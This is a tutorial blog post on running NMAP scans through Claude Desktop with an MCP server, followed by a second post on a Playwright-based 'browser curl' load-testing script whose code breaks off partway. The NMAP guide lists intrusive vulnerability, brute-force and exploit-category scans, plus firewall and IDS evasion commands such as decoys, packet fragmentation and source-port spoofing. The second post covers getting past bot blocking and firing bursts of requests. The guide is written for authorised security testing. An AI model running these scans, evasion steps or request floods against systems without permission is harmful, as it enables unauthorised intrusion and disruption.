macOS: Deep Dive into NMAP using Claude Desktop with an NMAP MCP

Introduction

NMAP (Network Mapper) is one of the most powerful and versatile network scanning tools available for security professionals, system administrators, and ethical hackers. When combined with Claude through the Model Context Protocol (MCP), it becomes an even more powerful tool, allowing you to leverage AI to intelligently analyze scan results, suggest scanning strategies, and interpret complex network data.

In this deep dive, we’ll explore how to set up NMAP with Claude Desktop using an MCP server, and demonstrate 20+ comprehensive vulnerability checks and reconnaissance techniques you can perform using natural language prompts.

⚠️ Legal Disclaimer: Only scan systems and networks you own or have explicit written permission to test. Unauthorized scanning may be illegal in your jurisdiction.

Prerequisites

  • macOS, Linux, or Windows with WSL
  • Basic understanding of networking concepts
  • Permission to scan target systems
  • Claude Desktop installed

Part 1: Installation and Setup

Step 1: Install NMAP

On macOS:

# Using Homebrew
brew install nmap

# Verify installation
nmap --version

On Linux (Ubuntu/Debian):

sudo apt update && sudo apt install -y nmap

Step 2: Install Node.js (Required for MCP Server)

The NMAP MCP server requires Node.js to run.

On macOS:

brew install node
node --version
npm --version

Step 3: Install the NMAP MCP Server

A widely used NMAP MCP server is available on GitHub. We'll clone it and build it locally:

cd ~/
rm -rf nmap-mcp-server
git clone https://github.com/PhialsBasement/nmap-mcp-server.git
cd nmap-mcp-server
npm install
npm run build

Step 4: Configure Claude Desktop

Edit the Claude Desktop configuration file to add the NMAP MCP server.

On macOS:

CONFIG_FILE="$HOME/Library/Application Support/Claude/claude_desktop_config.json"

cp "$CONFIG_FILE" "$CONFIG_FILE.backup"

python3 << 'EOF'
import json
import os

config_file = os.path.expanduser("~/Library/Application Support/Claude/claude_desktop_config.json")
username = os.environ['USER']

with open(config_file, 'r') as f:
    config = json.load(f)

if 'mcpServers' not in config:
    config['mcpServers'] = {}

config['mcpServers']['nmap'] = {
    "command": "node",
    "args": [
        f"/Users/{username}/nmap-mcp-server/dist/index.js"
    ],
    "env": {}
}

with open(config_file, 'w') as f:
    json.dump(config, f, indent=2)

print("nmap server added to Claude Desktop config!")
print(f"Backup saved to: {config_file}.backup")
EOF
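As a quick sanity check, this short Python snippet (a sketch, assuming the default macOS config path) confirms the entry was written:

```python
import json
import os

def has_nmap_server(config_path):
    """Return True if the Claude Desktop config registers an 'nmap' MCP server."""
    with open(config_path) as f:
        config = json.load(f)
    return "nmap" in config.get("mcpServers", {})

path = os.path.expanduser(
    "~/Library/Application Support/Claude/claude_desktop_config.json")
if os.path.exists(path):
    print("nmap server registered:", has_nmap_server(path))
```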


Step 5: Restart Claude Desktop

Close and reopen Claude Desktop. The NMAP tools should now appear in Claude Desktop's tools menu (the hammer/plug icon near the chat input).

Part 2: Understanding NMAP MCP Capabilities

Once configured, Claude can execute NMAP scans through the MCP server. The server typically provides:

  • Host discovery scans
  • Port scanning (TCP/UDP)
  • Service version detection
  • OS detection
  • Script scanning (NSE – NMAP Scripting Engine)
  • Output parsing and interpretation

Part 3: 20 Most Common Vulnerability Checks

For these examples, we’ll use a hypothetical target domain: example-target.com (replace with your authorized target).

1. Basic Host Discovery and Open Ports

Prompt:

Scan example-target.com to discover if the host is up and identify all open ports (1-1000). Use a TCP SYN scan for speed.

What this does: Performs a fast SYN scan on the first 1000 ports to quickly identify open services. SYN scans require raw socket access, so run NMAP with sudo (without root, use a TCP connect scan, -sT, instead).

Expected NMAP command:

nmap -sS -p 1-1000 example-target.com

2. Comprehensive Port Scan (All 65535 Ports)

Prompt:

Perform a comprehensive scan of all 65535 TCP ports on example-target.com to identify any services running on non-standard ports.

What this does: Scans every possible TCP port – time-consuming but thorough.

Expected NMAP command:

nmap -p- example-target.com

3. Service Version Detection

Prompt:

Scan the top 1000 ports on example-target.com and detect the exact versions of services running on open ports. This will help identify outdated software.

What this does: Probes open ports to determine service/version info, crucial for finding known vulnerabilities.

Expected NMAP command:

nmap -sV example-target.com

4. Operating System Detection

Prompt:

Detect the operating system running on example-target.com using TCP/IP stack fingerprinting. Include OS detection confidence levels.

What this does: Analyzes network responses to guess the target OS.

Expected NMAP command:

nmap -O example-target.com

5. Aggressive Scan (OS + Version + Scripts + Traceroute)

Prompt:

Run an aggressive scan on example-target.com that includes OS detection, version detection, script scanning, and traceroute. This is comprehensive but noisy.

What this does: Combines multiple detection techniques for maximum information.

Expected NMAP command:

nmap -A example-target.com

6. Vulnerability Scanning with NSE Scripts

Prompt:

Scan example-target.com using NMAP's vulnerability detection scripts to check for known CVEs and security issues in running services.

What this does: Uses NSE scripts from the ‘vuln’ category to detect known vulnerabilities.

Expected NMAP command:

nmap --script vuln example-target.com

7. SSL/TLS Security Analysis

Prompt:

Analyze SSL/TLS configuration on example-target.com (port 443). Check for weak ciphers, certificate issues, and SSL vulnerabilities like Heartbleed and POODLE.

What this does: Comprehensive SSL/TLS security assessment.

Expected NMAP command:

nmap -p 443 --script ssl-enum-ciphers,ssl-cert,ssl-heartbleed,ssl-poodle example-target.com
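Alongside the NSE checks, certificate expiry is easy to verify from Python's standard library. A minimal sketch (the hostname is a placeholder; the timestamp format matches what `ssl.SSLSocket.getpeercert()` returns):

```python
import socket
import ssl
from datetime import datetime, timezone

def days_until_expiry(not_after):
    """Days until a certificate's notAfter timestamp (getpeercert() format)."""
    expires = datetime.strptime(not_after, "%b %d %H:%M:%S %Y %Z")
    expires = expires.replace(tzinfo=timezone.utc)
    return (expires - datetime.now(timezone.utc)).days

def cert_not_after(host, port=443, timeout=5.0):
    """Fetch the peer certificate's notAfter field over a verified TLS connection."""
    ctx = ssl.create_default_context()
    with socket.create_connection((host, port), timeout=timeout) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            return tls.getpeercert()["notAfter"]
```

For example, `days_until_expiry(cert_not_after("example-target.com"))` gives a quick expiry countdown for an authorized target.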

8. HTTP Security Headers and Vulnerabilities

Prompt:

Check example-target.com's web server (ports 80, 443, 8080) for security headers, common web vulnerabilities, and HTTP methods allowed.

What this does: Tests for missing security headers, dangerous HTTP methods, and common web flaws.

Expected NMAP command:

nmap -p 80,443,8080 --script http-security-headers,http-methods,http-csrf,http-stored-xss example-target.com

9. SMB Vulnerability Scanning (EternalBlue)

Prompt:

Scan example-target.com for SMB vulnerabilities including MS17-010 (EternalBlue), SMB signing issues, and accessible shares.

What this does: Critical for identifying Windows systems vulnerable to ransomware exploits.

Expected NMAP command:

nmap -p 445 --script "smb-vuln-*,smb-enum-shares" example-target.com

10. SQL Injection Testing

Prompt:

Test web applications on example-target.com (ports 80, 443) for SQL injection vulnerabilities in common web paths and parameters.

What this does: Identifies potential SQL injection points.

Expected NMAP command:

nmap -p 80,443 --script http-sql-injection example-target.com

11. DNS Zone Transfer Vulnerability

Prompt:

Test if example-target.com's DNS servers allow unauthorized zone transfers, which could leak internal network information.

What this does: Attempts AXFR zone transfer – a serious misconfiguration if allowed.

Expected NMAP command:

nmap --script dns-zone-transfer --script-args dns-zone-transfer.domain=example-target.com -p 53 example-target.com

12. SSH Security Assessment

Prompt:

Analyze SSH configuration on example-target.com (port 22). Check for weak encryption algorithms, host keys, and authentication methods.

What this does: Identifies insecure SSH configurations.

Expected NMAP command:

nmap -p 22 --script ssh-auth-methods,ssh-hostkey,ssh2-enum-algos example-target.com

13. FTP Anonymous Access and Vulnerabilities

Prompt:

Check if example-target.com's FTP server (port 21) allows anonymous login and scan for FTP-related vulnerabilities.

What this does: Tests for anonymous FTP access and common FTP security issues.

Expected NMAP command:

nmap -p 21 --script ftp-anon,ftp-vuln-cve2010-4221,ftp-bounce example-target.com

14. Email Server Security (SMTP/POP3/IMAP)

Prompt:

Scan example-target.com's email servers (ports 25, 110, 143, 587, 993, 995) for open relays, STARTTLS support, and vulnerabilities.

What this does: Comprehensive email server security check.

Expected NMAP command:

nmap -p 25,110,143,587,993,995 --script smtp-open-relay,smtp-enum-users,ssl-cert example-target.com

15. Database Server Exposure

Prompt:

Check if example-target.com has publicly accessible database servers (MySQL, PostgreSQL, MongoDB, Redis) and test for default credentials.

What this does: Identifies exposed databases, a critical security issue.

Expected NMAP command:

nmap -p 3306,5432,27017,6379 --script mysql-empty-password,pgsql-brute,mongodb-databases,redis-info example-target.com
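As a complement to the NMAP probe, the same reachability check can be sketched with a plain TCP connect from Python's standard library (the port-to-service mapping is assumed from the command above):

```python
import socket

DB_PORTS = {3306: "MySQL", 5432: "PostgreSQL", 27017: "MongoDB", 6379: "Redis"}

def open_db_ports(host, ports=DB_PORTS, timeout=2.0):
    """Return {port: service} for ports that accept a TCP connection."""
    found = {}
    for port, service in ports.items():
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:  # 0 means the connect succeeded
                found[port] = service
    return found
```

A connect succeeding only proves the port is reachable; NMAP's scripts are still needed to test for default credentials or unauthenticated access.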

16. WordPress Security Scan

Prompt:

If example-target.com runs WordPress, enumerate plugins, themes, and users, and check for known vulnerabilities.

What this does: WordPress-specific security assessment.

Expected NMAP command:

nmap -p 80,443 --script http-wordpress-enum,http-wordpress-users example-target.com

17. XML External Entity (XXE) Vulnerability

Prompt:

Test web services on example-target.com for XML External Entity (XXE) injection vulnerabilities.

What this does: Attempts to flag XML-handling flaws. Note that NMAP ships no NSE script dedicated to XXE; the script shown below actually targets CVE-2017-5638 (an Apache Struts OGNL injection flaw), which is related but distinct. Dedicated XXE testing is better done with a web proxy such as Burp Suite or OWASP ZAP.

Expected NMAP command:

nmap -p 80,443 --script http-vuln-cve2017-5638 example-target.com

18. SNMP Information Disclosure

Prompt:

Scan example-target.com for SNMP services (UDP port 161) and attempt to extract system information using common community strings.

What this does: SNMP can leak sensitive system information.

Expected NMAP command:

nmap -sU -p 161 --script snmp-brute,snmp-info example-target.com

19. RDP Security Assessment

Prompt:

Check if Remote Desktop Protocol (RDP) on example-target.com (port 3389) is vulnerable to known exploits like BlueKeep (CVE-2019-0708).

What this does: Critical Windows remote access security check. Stock NMAP ships rdp-vuln-ms12-020 and rdp-enum-encryption; detecting BlueKeep (CVE-2019-0708) requires a community NSE script that is not bundled with NMAP.

Expected NMAP command:

nmap -p 3389 --script rdp-vuln-ms12-020,rdp-enum-encryption example-target.com

20. API Endpoint Discovery and Testing

Prompt:

Discover API endpoints on example-target.com and test for common API vulnerabilities including authentication bypass and information disclosure.

What this does: Identifies REST APIs and tests for common API security issues.

Expected NMAP command:

nmap -p 80,443,8080,8443 --script http-methods,http-auth-finder,http-devframework example-target.com

Part 4: Deep Dive Exercises

Deep Dive Exercise 1: Complete Web Application Security Assessment

Scenario: You need to perform a comprehensive security assessment of a web application running at webapp.example-target.com.

Claude Prompt:

I need a complete security assessment of webapp.example-target.com. Please:

1. First, discover all open ports and running services
2. Identify the web server software and version
3. Check for SSL/TLS vulnerabilities and certificate issues
4. Test for common web vulnerabilities (XSS, SQLi, CSRF)
5. Check security headers (CSP, HSTS, X-Frame-Options, etc.)
6. Enumerate web directories and interesting files
7. Test for backup file exposure (.bak, .old, .zip)
8. Check for sensitive information in robots.txt and sitemap.xml
9. Test HTTP methods for dangerous verbs (PUT, DELETE, TRACE)
10. Provide a prioritized summary of findings with remediation advice

Use timing template T3 (normal) to avoid overwhelming the target.

What Claude will do:

Claude will execute multiple NMAP scans in sequence, starting with discovery and progressively getting more detailed. Example commands it might run:

# Phase 1: Discovery
nmap -sV -T3 webapp.example-target.com

# Phase 2: SSL/TLS Analysis
nmap -p 443 -T3 --script ssl-cert,ssl-enum-ciphers,ssl-known-key,ssl-heartbleed,ssl-poodle,ssl-ccs-injection webapp.example-target.com

# Phase 3: Web Vulnerability Scanning
nmap -p 80,443 -T3 --script http-security-headers,http-csrf,http-sql-injection,http-stored-xss,http-dombased-xss webapp.example-target.com

# Phase 4: Directory and File Enumeration
nmap -p 80,443 -T3 --script http-enum,http-backup-finder webapp.example-target.com

# Phase 5: HTTP Methods Testing
nmap -p 80,443 -T3 --script http-methods --script-args http-methods.test-all webapp.example-target.com

Learning Outcomes:

  • Understanding layered security assessment methodology
  • How to interpret multiple scan results holistically
  • Prioritization of security findings by severity
  • Claude’s ability to correlate findings across multiple scans

Deep Dive Exercise 2: Network Perimeter Reconnaissance

Scenario: You’re assessing the security perimeter of an organization with the domain company.example-target.com and a known IP range 198.51.100.0/24.

Claude Prompt:

Perform comprehensive network perimeter reconnaissance for company.example-target.com (IP range 198.51.100.0/24). I need to:

1. Discover all live hosts in the IP range
2. For each live host, identify:
   - Operating system
   - All open ports (full 65535 range)
   - Service versions
   - Potential vulnerabilities
3. Map the network topology and identify:
   - Firewalls and filtering
   - DMZ hosts vs internal hosts
   - Critical infrastructure (DNS, mail, web servers)
4. Test for common network misconfigurations:
   - Open DNS resolvers
   - Open mail relays
   - Unauthenticated database access
   - Unencrypted management protocols (Telnet, FTP)
5. Provide a network map and executive summary

Use slow timing (T2) to minimize detection risk and avoid false positives.

What Claude will do:

# Phase 1: Host Discovery
nmap -sn -T2 198.51.100.0/24

# Phase 2: OS Detection on Live Hosts
nmap -O -T2 198.51.100.0/24

# Phase 3: Comprehensive Port Scan (may suggest splitting into chunks)
nmap -p- -T2 198.51.100.0/24

# Phase 4: Service Version Detection
nmap -sV -T2 198.51.100.0/24

# Phase 5: Specific Service Checks
nmap -p 53 --script dns-recursion 198.51.100.0/24
nmap -p 25 --script smtp-open-relay 198.51.100.0/24
nmap -p 3306,5432,27017 --script mysql-empty-password,pgsql-brute,mongodb-databases 198.51.100.0/24
nmap -p 23,21 198.51.100.0/24

# Phase 6: Vulnerability Scanning on Critical Hosts
nmap --script vuln -T2 [critical-hosts]

Learning Outcomes:

  • Large-scale network scanning strategies
  • How to handle and analyze results from multiple hosts
  • Network segmentation analysis
  • Risk assessment across an entire network perimeter
  • Understanding firewall and filtering detection

Deep Dive Exercise 3: Advanced Vulnerability Research – Zero-Day Hunting

Scenario: You’ve discovered a host running potentially vulnerable services and want to do deep reconnaissance to identify potential zero-day vulnerabilities or chained exploits.

Claude Prompt:

I've found a server at secure-server.example-target.com that's running multiple services. I need advanced vulnerability research:

1. Aggressive version fingerprinting of all services
2. Check for version-specific CVEs in detected software
3. Look for unusual port combinations that might indicate custom applications
4. Test for default credentials on all identified services
5. Check for known backdoors in the detected software versions
6. Test for authentication bypass vulnerabilities
7. Look for information disclosure issues (version strings, debug info, error messages)
8. Test for timing attacks and race conditions
9. Analyze for possible exploit chains (e.g., LFI -> RCE)
10. Provide detailed analysis with CVSS scores and exploit availability

Run this aggressively (-T4) as we have permission for intensive testing.

What Claude will do:

# Phase 1: Aggressive Fingerprinting
nmap -sV --version-intensity 9 -T4 secure-server.example-target.com

# Phase 2: All Vulnerability Scripts
nmap --script vuln,exploit -T4 secure-server.example-target.com

# Phase 3: Default Credential Testing
nmap --script auth -T4 secure-server.example-target.com

# Phase 4: Backdoor Detection (known service backdoors plus unusual ports)
nmap --script ftp-vsftpd-backdoor,irc-unrealircd-backdoor,unusual-port -T4 secure-server.example-target.com

# Phase 5: Authentication Testing
nmap --script auth,brute -T4 secure-server.example-target.com

# Phase 6: Information Disclosure
nmap --script banner,http-errors,http-git,http-svn-enum -T4 secure-server.example-target.com

# Phase 7: Service-Specific Deep Dives
# (Claude will run targeted scripts based on discovered services)

After scans, Claude will:

  • Cross-reference detected versions with CVE databases
  • Explain potential exploit chains
  • Provide PoC (Proof of Concept) suggestions
  • Recommend remediation priorities
  • Suggest additional manual testing techniques

Learning Outcomes:

  • Advanced NSE scripting capabilities
  • How to correlate vulnerabilities for exploit chains
  • Understanding vulnerability severity and exploitability
  • Version-specific vulnerability research
  • Claude’s ability to provide context from its training data about specific CVEs

Part 5: Wide-Ranging Reconnaissance Exercises

Exercise 5.1: Subdomain Discovery and Mapping

Prompt:

Help me discover all subdomains of example-target.com and create a complete map of their infrastructure. For each subdomain found:
- Resolve its IP addresses
- Check if it's hosted on the same infrastructure
- Identify the services running
- Note any interesting or unusual findings

Also check for common subdomain patterns like api, dev, staging, admin, etc.

What this reveals: Shadow IT, forgotten dev servers, API endpoints, and the organization’s infrastructure footprint.
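The common-pattern part of this exercise can be sketched in Python with the standard library (the label list below is an assumption; real subdomain wordlists are far larger):

```python
import socket

COMMON_LABELS = ["api", "dev", "staging", "admin", "mail", "vpn", "test"]

def candidate_subdomains(domain, labels=COMMON_LABELS):
    """Expand common labels into fully qualified candidate subdomains."""
    return [f"{label}.{domain}" for label in labels]

def resolve_ipv4(host):
    """Return the host's IPv4 addresses, or an empty list if it does not resolve."""
    try:
        return sorted({info[4][0] for info in socket.getaddrinfo(host, None, socket.AF_INET)})
    except socket.gaierror:
        return []
```

Candidates that resolve can then be fed back to Claude for per-host NMAP scans.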

Exercise 5.2: API Security Testing

Prompt:

I've found an API at api.example-target.com. Please:
1. Identify the API type (REST, GraphQL, SOAP)
2. Discover all available endpoints
3. Test authentication mechanisms
4. Check for rate limiting
5. Test for IDOR (Insecure Direct Object References)
6. Look for excessive data exposure
7. Test for injection vulnerabilities
8. Check API versioning and test old versions for vulnerabilities
9. Verify CORS configuration
10. Test for JWT vulnerabilities if applicable

Exercise 5.3: Cloud Infrastructure Detection

Prompt:

Scan example-target.com to identify if they're using cloud infrastructure (AWS, Azure, GCP). Look for:
- Cloud-specific IP ranges
- S3 buckets or blob storage
- Cloud-specific services (CloudFront, Azure CDN, etc.)
- Misconfigured cloud resources
- Storage bucket permissions
- Cloud metadata services exposure

Exercise 5.4: IoT and Embedded Device Discovery

Prompt:

Scan the network 192.168.1.0/24 for IoT and embedded devices such as:
- IP cameras
- Smart TVs
- Printers
- Network attached storage (NAS)
- Home automation systems
- Industrial control systems (ICS/SCADA if applicable)

Check each device for:
- Default credentials
- Outdated firmware
- Unencrypted communications
- Exposed management interfaces

Exercise 5.5: Checking for Known Vulnerabilities and Old Software

Prompt:

Perform a comprehensive audit of example-target.com focusing on outdated and vulnerable software:

1. Detect exact versions of all running services
2. For each service, check if it's end-of-life (EOL)
3. Identify known CVEs for each version detected
4. Prioritize findings by:
   - CVSS score
   - Exploit availability
   - Exposure (internet-facing vs internal)
5. Check for:
   - Outdated TLS/SSL versions
   - Deprecated cryptographic algorithms
   - Unpatched web frameworks
   - Old CMS versions (WordPress, Joomla, Drupal)
   - Legacy protocols (SSLv3, TLS 1.0, weak ciphers)
6. Generate a remediation roadmap with version upgrade recommendations

Expected approach:

# Detailed version detection
nmap -sV --version-intensity 9 example-target.com

# Check web server headers for version and generator strings
nmap -sV -p 80,443 --script http-server-header,http-generator example-target.com

# SSL/TLS testing
nmap -p 443 --script ssl-cert,ssl-enum-ciphers,sslv2,ssl-date example-target.com

# CMS detection
nmap -p 80,443 --script http-wordpress-enum,http-joomla-brute,http-drupal-enum example-target.com

Claude will then analyze the results and provide:

  • A table of detected software with current versions and latest versions
  • CVE listings with severity scores
  • Specific upgrade recommendations
  • Risk assessment for each finding

Part 6: Advanced Tips and Techniques

6.1 Optimizing Scan Performance

Timing Templates:

  • -T0 (Paranoid): Extremely slow, for IDS evasion
  • -T1 (Sneaky): Slow, minimal detection risk
  • -T2 (Polite): Slower, less bandwidth intensive
  • -T3 (Normal): Default, balanced approach
  • -T4 (Aggressive): Faster, assumes good network
  • -T5 (Insane): Extremely fast, may miss results

Prompt:

Explain when to use each NMAP timing template and demonstrate the difference by scanning example-target.com with T2 and T4 timing.

6.2 Evading Firewalls and IDS

Prompt:

Scan example-target.com using techniques to evade firewalls and intrusion detection systems:
- Fragment packets
- Use decoy IP addresses
- Randomize scan order
- Use idle scan if possible
- Spoof MAC address (if on local network)
- Use source port 53 or 80 to bypass egress filtering

Expected command examples:

# Fragmented packets
nmap -f example-target.com

# Decoy scan
nmap -D RND:10 example-target.com

# Randomize hosts
nmap --randomize-hosts example-target.com

# Source port spoofing
nmap --source-port 53 example-target.com

6.3 Creating Custom NSE Scripts with Claude

Prompt:

Help me create a custom NSE script that checks for a specific vulnerability in our custom application running on port 8080. The vulnerability is that the /debug endpoint returns sensitive configuration data without authentication.

Claude can help you write Lua scripts for NMAP’s scripting engine!

6.4 Output Parsing and Reporting

Prompt:

Scan example-target.com and save results in all available formats (normal, XML, grepable, script kiddie). Then help me parse the XML output to extract just the critical and high severity findings for a report.

Expected command:

nmap -oA scan_results example-target.com

Claude can then help you parse the XML file programmatically.
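For example, extracting open ports from the XML output (`scan_results.xml` from the `-oA` run above) takes only the standard library:

```python
import xml.etree.ElementTree as ET

def open_ports(xml_text):
    """Extract (port, protocol, service) tuples for open ports from nmap -oX output."""
    root = ET.fromstring(xml_text)
    results = []
    for host in root.iter("host"):
        for port in host.iter("port"):
            state = port.find("state")
            if state is not None and state.get("state") == "open":
                svc = port.find("service")
                name = svc.get("name") if svc is not None else ""
                results.append((int(port.get("portid")), port.get("protocol"), name))
    return results
```

Load the file with `open_ports(open("scan_results.xml").read())`, then hand the filtered list to Claude for report drafting.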

Part 7: Responsible Disclosure and Next Steps

After Finding Vulnerabilities

  1. Document everything: Keep detailed records of your findings
  2. Prioritize by risk: Use CVSS scores and business impact
  3. Responsible disclosure: Follow the organization’s security policy
  4. Remediation tracking: Help create an action plan
  5. Verify fixes: Re-test after patches are applied

Using Claude for Post-Scan Analysis

Prompt:

I've completed my NMAP scans and found 15 vulnerabilities. Here are the results: [paste scan output]. 

Please:
1. Categorize by severity (Critical, High, Medium, Low, Info)
2. Explain each vulnerability in business terms
3. Provide remediation steps for each
4. Suggest a remediation priority order
5. Draft an executive summary for management
6. Create technical remediation tickets for the engineering team

Claude excels at translating technical scan results into actionable business intelligence.
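The severity-bucketing step is mechanical enough to script yourself. A sketch using the standard CVSS v3 bands (findings are plain dicts; the field names are an assumption):

```python
def severity(cvss):
    """Map a CVSS v3 base score to its standard severity band."""
    if cvss >= 9.0:
        return "Critical"
    if cvss >= 7.0:
        return "High"
    if cvss >= 4.0:
        return "Medium"
    if cvss > 0.0:
        return "Low"
    return "Info"

def prioritize(findings):
    """Sort findings (dicts with 'name' and 'cvss' keys) highest score first."""
    return sorted(findings, key=lambda f: f["cvss"], reverse=True)
```

Pre-sorting the findings this way gives Claude a consistent input for the executive summary and ticket drafts.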

Part 8: Continuous Monitoring with NMAP and Claude

Set up regular scanning routines and use Claude to track changes:

Prompt:

Create a baseline scan of example-target.com and save it. Then help me set up a cron job (or scheduled task) to run weekly scans and alert me to any changes in:
- New open ports
- Changed service versions
- New hosts discovered
- Changes in vulnerabilities detected
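The change-detection logic itself is simple to sketch: represent each weekly scan as a mapping of host to open-port set, then diff against the baseline (a minimal example, not a full monitoring pipeline):

```python
def diff_scans(baseline, current):
    """Compare two scan snapshots of the form {host: set(open_ports)}.

    Returns newly seen hosts and newly opened ports on known hosts.
    """
    changes = {
        "new_hosts": sorted(set(current) - set(baseline)),
        "new_ports": {},
    }
    for host, ports in current.items():
        if host not in baseline:
            continue  # already reported under new_hosts
        added = ports - baseline[host]
        if added:
            changes["new_ports"][host] = sorted(added)
    return changes
```

Feed the diff output (rather than raw scans) to Claude each week, so it only analyzes what changed.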

Conclusion

Combining NMAP’s powerful network scanning capabilities with Claude’s AI-driven analysis creates a formidable security assessment toolkit. The Model Context Protocol bridges these tools seamlessly, allowing you to:

  • Express complex scanning requirements in natural language
  • Get intelligent interpretation of scan results
  • Receive contextual security advice
  • Automate repetitive reconnaissance tasks
  • Learn security concepts through interactive exploration

Key Takeaways:

  1. Always get permission before scanning any network or system
  2. Start with gentle scans and progressively get more aggressive
  3. Use timing controls to avoid overwhelming targets or triggering alarms
  4. Correlate multiple scans for a complete security picture
  5. Leverage Claude’s knowledge to interpret results and suggest next steps
  6. Document everything for compliance and knowledge sharing
  7. Keep NMAP updated to benefit from the latest scripts and capabilities

The examples provided in this guide demonstrate just a fraction of what’s possible when combining NMAP with AI assistance. As you become more comfortable with this workflow, you’ll discover new ways to leverage Claude’s understanding to make your security assessments more efficient and comprehensive.

Additional Resources

About the Author: This guide was created to help security professionals and system administrators leverage AI assistance for more effective network reconnaissance and vulnerability assessment.

Last Updated: 2025-11-21

Version: 1.0

Building an advanced Browser Curl Script with Playwright and Selenium for load testing websites

Modern sites often block plain curl. Using a real browser engine (Chromium via Playwright) gives you true browser behavior: a real TLS/HTTP2 stack, cookies, redirects, and JavaScript execution if needed. This post mirrors the functionality of the original browser_curl.sh wrapper, reimplemented with Playwright. It also includes an optional Selenium mini-variant at the end.

What this tool does

  • Sends realistic browser headers (Chrome-like)
  • Uses Chromium’s real network stack (HTTP/2, compression)
  • Manages cookies (persist to a file)
  • Follows redirects by default
  • Supports JSON and form POSTs
  • Async mode that returns immediately
  • --count N to dispatch N async requests for quick load tests

Note: Advanced bot defenses (CAPTCHAs, JS/ML challenges, strict TLS/HTTP2 fingerprinting) may still require full page automation and real user-like behavior. Playwright can do that too by driving real pages.

Setup

Run these once to install Playwright and Chromium:

npm init -y && \
npm install playwright && \
npx playwright install chromium

The complete Playwright CLI

Run this to create browser_playwright.mjs:

cat > browser_playwright.mjs << 'EOF'
#!/usr/bin/env node
import { chromium } from 'playwright';
import fs from 'fs';
import path from 'path';
import { spawn } from 'child_process';
const RED = '\u001b[31m';
const GRN = '\u001b[32m';
const YLW = '\u001b[33m';
const NC  = '\u001b[0m';
function usage() {
const b = path.basename(process.argv[1]);
console.log(`Usage: ${b} [OPTIONS] URL
Advanced HTTP client using Playwright (Chromium) with browser-like behavior.
OPTIONS:
-X, --method METHOD        HTTP method (GET, POST, PUT, DELETE) [default: GET]
-d, --data DATA            Request body
-H, --header HEADER        Add custom header (repeatable)
-o, --output FILE          Write response body to file
-c, --cookie FILE          Cookie storage file [default: /tmp/pw_cookies_<pid>.json]
-A, --user-agent UA        Custom User-Agent
-t, --timeout SECONDS      Request timeout [default: 30]
--async                Run request(s) in background
--count N              Number of async requests to fire [default: 1, requires --async]
--no-redirect          Do not follow redirects (best-effort)
--show-headers         Print response headers
--json                 Send data as JSON (sets Content-Type)
--form                 Send data as application/x-www-form-urlencoded
-v, --verbose              Verbose output
-h, --help                 Show this help message
EXAMPLES:
${b} https://example.com
${b} --async https://example.com
${b} -X POST --json -d '{"a":1}' https://httpbin.org/post
${b} --async --count 10 https://httpbin.org/get
`);
}
function parseArgs(argv) {
const args = { method: 'GET', async: false, count: 1, followRedirects: true, showHeaders: false, timeout: 30, data: '', contentType: '', cookieFile: '', verbose: false, headers: [], url: '' };
for (let i = 0; i < argv.length; i++) {
const a = argv[i];
switch (a) {
case '-X': case '--method': args.method = String(argv[++i] || 'GET'); break;
case '-d': case '--data': args.data = String(argv[++i] || ''); break;
case '-H': case '--header': args.headers.push(String(argv[++i] || '')); break;
case '-o': case '--output': args.output = String(argv[++i] || ''); break;
case '-c': case '--cookie': args.cookieFile = String(argv[++i] || ''); break;
case '-A': case '--user-agent': args.userAgent = String(argv[++i] || ''); break;
case '-t': case '--timeout': args.timeout = Number(argv[++i] || '30'); break;
case '--async': args.async = true; break;
case '--count': args.count = Number(argv[++i] || '1'); break;
case '--no-redirect': args.followRedirects = false; break;
case '--show-headers': args.showHeaders = true; break;
case '--json': args.contentType = 'application/json'; break;
case '--form': args.contentType = 'application/x-www-form-urlencoded'; break;
case '-v': case '--verbose': args.verbose = true; break;
case '-h': case '--help': usage(); process.exit(0);
default:
if (!args.url && !a.startsWith('-')) args.url = a; else {
console.error(`${RED}Error: Unknown argument: ${a}${NC}`);
process.exit(1);
}
}
}
return args;
}
function parseHeaderList(list) {
const out = {};
for (const h of list) {
const idx = h.indexOf(':');
if (idx === -1) continue;
const name = h.slice(0, idx).trim();
const value = h.slice(idx + 1).trim();
if (!name) continue;
out[name] = value;
}
return out;
}
function buildDefaultHeaders(userAgent) {
const ua = userAgent || 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36';
return {
'User-Agent': ua,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.9',
'Accept-Encoding': 'gzip, deflate, br',
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
'Sec-Fetch-Dest': 'document',
'Sec-Fetch-Mode': 'navigate',
'Sec-Fetch-Site': 'none',
'Sec-Fetch-User': '?1',
'Cache-Control': 'max-age=0'
};
}
async function performRequest(opts) {
// Cookie file handling
const defaultCookie = `/tmp/pw_cookies_${process.pid}.json`;
const cookieFile = opts.cookieFile || defaultCookie;
// Launch Chromium
const browser = await chromium.launch({ headless: true });
const extraHeaders = { ...buildDefaultHeaders(opts.userAgent), ...parseHeaderList(opts.headers) };
if (opts.contentType) extraHeaders['Content-Type'] = opts.contentType;
const context = await browser.newContext({ userAgent: extraHeaders['User-Agent'], extraHTTPHeaders: extraHeaders });
// Load cookies if present
if (fs.existsSync(cookieFile)) {
try {
const ss = JSON.parse(fs.readFileSync(cookieFile, 'utf8'));
if (ss.cookies?.length) await context.addCookies(ss.cookies);
} catch {}
}
const request = context.request;
// Build request options
const reqOpts = { headers: extraHeaders, timeout: opts.timeout * 1000 };
if (opts.data) {
// Playwright will detect JSON strings vs form strings by headers
reqOpts.data = opts.data;
}
if (opts.followRedirects === false) {
// Best-effort: limit redirects to 0
reqOpts.maxRedirects = 0;
}
const method = opts.method.toUpperCase();
let resp;
try {
if (method === 'GET') resp = await request.get(opts.url, reqOpts);
else if (method === 'POST') resp = await request.post(opts.url, reqOpts);
else if (method === 'PUT') resp = await request.put(opts.url, reqOpts);
else if (method === 'DELETE') resp = await request.delete(opts.url, reqOpts);
else if (method === 'PATCH') resp = await request.patch(opts.url, reqOpts);
else {
console.error(`${RED}Unsupported method: ${method}${NC}`);
await browser.close();
process.exit(2);
}
} catch (e) {
console.error(`${RED}[ERROR] ${e?.message || e}${NC}`);
await browser.close();
process.exit(3);
}
// Persist cookies
try {
